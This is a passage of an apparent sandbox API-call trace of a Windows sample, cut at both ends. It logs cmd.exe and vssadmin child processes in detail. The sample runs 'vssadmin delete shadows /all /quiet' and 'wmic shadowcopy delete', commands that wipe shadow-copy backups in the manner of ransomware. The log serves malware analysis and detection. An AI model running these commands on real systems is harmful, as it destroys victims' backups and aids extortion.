() returned 0x550000 [0063.596] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5634b0 | out: hHeap=0x550000) returned 1 [0063.596] GetProcessHeap () returned 0x550000 [0063.596] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa) returned 0x55fef0 [0063.596] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0063.598] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ef3c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef40c | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x2ef40c*(hProcess=0x78, hThread=0x74, dwProcessId=0x820, dwThreadId=0xbd4)) returned 1 [0063.650] CloseHandle (hObject=0x74) returned 1 [0063.650] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0063.650] GetProcessHeap () returned 0x550000 [0063.650] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565ee0 | out: hHeap=0x550000) returned 1 [0063.650] GetEnvironmentStringsW () returned 0x565ee0* [0063.650] GetProcessHeap () returned 0x550000 [0063.650] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x5640a0 [0063.650] FreeEnvironmentStringsW (penv=0x565ee0) returned 1 [0063.650] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0084.736] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ef300 | out: lpExitCode=0x2ef300*=0x2) returned 1 [0084.736] CloseHandle (hObject=0x78) returned 1 [0084.737] _vsnwprintf (in: _Buffer=0x2ef448, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef30c | out: _Buffer="00000002") returned 8 [0084.737] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0084.738] GetProcessHeap () returned 0x550000 [0084.738] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5640a0 | out: hHeap=0x550000) returned 1 [0084.738] GetEnvironmentStringsW () returned 0x5640a0* [0084.738] GetProcessHeap () returned 0x550000 [0084.738] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x569588 [0084.738] FreeEnvironmentStringsW (penv=0x5640a0) returned 1 [0084.738] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0084.738] GetProcessHeap () returned 0x550000 [0084.738] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569588 | out: hHeap=0x550000) returned 1 [0084.738] GetEnvironmentStringsW () returned 0x5640a0* [0084.738] GetProcessHeap () returned 0x550000 [0084.738] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x569588 [0084.738] FreeEnvironmentStringsW (penv=0x5640a0) returned 1 [0084.738] GetProcessHeap () returned 0x550000 [0084.738] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55fef0 | out: hHeap=0x550000) returned 1 [0084.739] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef364 | out: lpAttributeList=0x2ef364) [0084.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0084.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0084.740] _get_osfhandle (_FileHandle=0) returned 0x3 [0084.740] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0084.740] SetConsoleInputExeNameW () returned 0x1 [0084.740] GetConsoleOutputCP () returned 0x1b5 [0084.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0084.741] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.741] exit (_Code=2) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x20800000" os_pid = "0x7f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "cmd.exe /c wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x804 [0062.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fee4 | out: lpSystemTimeAsFileTime=0x24fee4*(dwLowDateTime=0x1a0fdb20, dwHighDateTime=0x1d62227)) [0062.635] GetCurrentProcessId () returned 0x7f4 [0062.635] GetCurrentThreadId () returned 0x804 [0062.635] GetTickCount () returned 0x1149741 [0062.635] QueryPerformanceCounter (in: lpPerformanceCount=0x24fedc | out: lpPerformanceCount=0x24fedc*=18259062023) returned 1 [0062.636] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0062.637] __set_app_type (_Type=0x1) [0062.637] __p__fmode () returned 0x770331f4 [0062.753] __p__commode () returned 0x770331fc [0062.753] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0062.753] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0062.754] GetCurrentThreadId () returned 0x804 [0062.754] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x804) returned 0x60 [0062.754] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.754] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0062.754] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.754] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0062.754] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe74 | out: phkResult=0x24fe74*=0x0) returned 0x2 [0062.755] VirtualQuery (in: lpAddress=0x24feab, lpBuffer=0x24fe44, dwLength=0x1c | out: lpBuffer=0x24fe44*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.755] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fe44, dwLength=0x1c | out: lpBuffer=0x24fe44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0062.755] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fe44, dwLength=0x1c | out: lpBuffer=0x24fe44*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0062.755] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fe44, dwLength=0x1c | out: lpBuffer=0x24fe44*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.755] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fe44, dwLength=0x1c | out: lpBuffer=0x24fe44*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x150000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0062.755] GetConsoleOutputCP () returned 0x1b5 [0062.755] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.755] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0062.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.755] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0062.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.755] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0062.756] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.756] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.756] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.756] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0062.758] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.758] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0062.758] GetEnvironmentStringsW () returned 0x581ff0* [0062.758] GetProcessHeap () returned 0x570000 [0062.758] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xaca) returned 0x582ac8 [0062.758] FreeEnvironmentStringsW (penv=0x581ff0) returned 1 [0062.758] GetProcessHeap () returned 0x570000 [0062.758] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4) returned 0x580c28 [0062.758] GetEnvironmentStringsW () returned 0x581ff0* [0062.758] GetProcessHeap () returned 0x570000 [0062.758] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xaca) returned 0x5835a0 [0062.758] FreeEnvironmentStringsW (penv=0x581ff0) returned 1 [0062.759] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ede4 | out: phkResult=0x24ede4*=0x68) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x0, lpData=0x24edf0*=0x0, lpcbData=0x24ede8*=0x1000) returned 0x2 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x1, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x0, lpData=0x24edf0*=0x1, lpcbData=0x24ede8*=0x1000) returned 0x2 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x0, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x40, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x40, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x0, lpData=0x24edf0*=0x40, lpcbData=0x24ede8*=0x1000) returned 0x2 [0062.759] RegCloseKey (hKey=0x68) returned 0x0 [0062.759] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ede4 | out: phkResult=0x24ede4*=0x68) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x0, lpData=0x24edf0*=0x40, lpcbData=0x24ede8*=0x1000) returned 0x2 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x1, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x0, lpData=0x24edf0*=0x1, lpcbData=0x24ede8*=0x1000) returned 0x2 [0062.759] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x0, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.760] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x9, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.760] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x4, lpData=0x24edf0*=0x9, lpcbData=0x24ede8*=0x4) returned 0x0 [0062.760] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24edec, lpData=0x24edf0, lpcbData=0x24ede8*=0x1000 | out: lpType=0x24edec*=0x0, lpData=0x24edf0*=0x9, lpcbData=0x24ede8*=0x1000) returned 0x2 [0062.760] RegCloseKey (hKey=0x68) returned 0x0 [0062.760] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb031ff [0062.760] srand (_Seed=0x5eb031ff) [0062.760] GetCommandLineW () returned="cmd.exe /c wmic shadowcopy delete" [0062.760] GetCommandLineW () returned="cmd.exe /c wmic shadowcopy delete" [0062.761] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.761] GetProcessHeap () returned 0x570000 [0062.761] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x581ff0 [0062.761] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x581ff8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0062.762] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.762] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.762] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0062.762] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0062.762] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0062.762] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0062.762] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0062.762] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0062.762] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0062.762] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.762] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0062.762] GetProcessHeap () returned 0x570000 [0062.762] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x582ac8 | out: hHeap=0x570000) returned 1 [0062.762] GetEnvironmentStringsW () returned 0x582208* [0062.762] GetProcessHeap () returned 0x570000 [0062.763] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xae2) returned 0x584b68 [0062.763] FreeEnvironmentStringsW (penv=0x582208) returned 1 [0062.763] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.763] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.763] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0062.763] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0062.763] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0062.763] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0062.763] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0062.763] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0062.763] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0062.763] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0062.763] GetProcessHeap () returned 0x570000 [0062.763] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x585658 [0062.763] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fbb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24fbb0, lpFilePart=0x24fbac | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24fbac*="Desktop") returned 0x25 [0062.763] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.763] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f92c | out: lpFindFileData=0x24f92c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x581e70 [0062.764] FindClose (in: hFindFile=0x581e70 | out: hFindFile=0x581e70) returned 1 [0062.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f92c | out: lpFindFileData=0x24f92c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x581e70 [0062.764] FindClose (in: hFindFile=0x581e70 | out: hFindFile=0x581e70) returned 1 [0062.764] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0062.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f92c | out: lpFindFileData=0x24f92c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x581e70 [0062.764] FindClose (in: hFindFile=0x581e70 | out: hFindFile=0x581e70) returned 1 [0062.764] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.764] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0062.764] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0062.764] GetProcessHeap () returned 0x570000 [0062.764] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584b68 | out: hHeap=0x570000) returned 1 [0062.764] GetEnvironmentStringsW () returned 0x584078* [0062.765] GetProcessHeap () returned 0x570000 [0062.765] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x585eb8 [0062.765] FreeEnvironmentStringsW (penv=0x584078) returned 1 [0062.765] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.765] GetProcessHeap () returned 0x570000 [0062.765] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585658 | out: hHeap=0x570000) returned 1 [0062.765] GetProcessHeap () returned 0x570000 [0062.765] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400e) returned 0x5869f8 [0062.765] GetProcessHeap () returned 0x570000 [0062.765] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x581e70 [0062.765] GetProcessHeap () returned 0x570000 [0062.766] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5869f8 | out: hHeap=0x570000) returned 1 [0062.766] GetConsoleOutputCP () returned 0x1b5 [0062.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.766] GetUserDefaultLCID () returned 0x409 [0062.766] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fcf0, cchData=128 | out: lpLCData="0") returned 2 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fcf0, cchData=128 | out: lpLCData="0") returned 2 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fcf0, cchData=128 | out: lpLCData="1") returned 2 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0062.767] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0062.768] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0062.768] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0062.769] GetProcessHeap () returned 0x570000 [0062.769] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20c) returned 0x582d80 [0062.769] GetConsoleTitleW (in: lpConsoleTitle=0x582d80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.770] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0062.770] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0062.770] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0062.771] GetProcessHeap () returned 0x570000 [0062.771] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400a) returned 0x5869f8 [0062.771] GetProcessHeap () returned 0x570000 [0062.771] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5869f8 | out: hHeap=0x570000) returned 1 [0062.772] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0062.772] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0062.772] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0062.772] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0062.772] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0062.772] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0062.772] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0062.772] GetProcessHeap () returned 0x570000 [0062.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x582f98 [0062.772] GetProcessHeap () returned 0x570000 [0062.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x582ff8 [0062.773] GetProcessHeap () returned 0x570000 [0062.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x583018 [0062.774] GetConsoleTitleW (in: lpConsoleTitle=0x24f9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.775] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0062.775] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0062.775] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0062.775] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0062.775] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0062.775] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0062.775] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0062.775] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0062.775] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0062.775] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0062.775] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0062.775] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0062.775] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0062.775] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0062.775] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 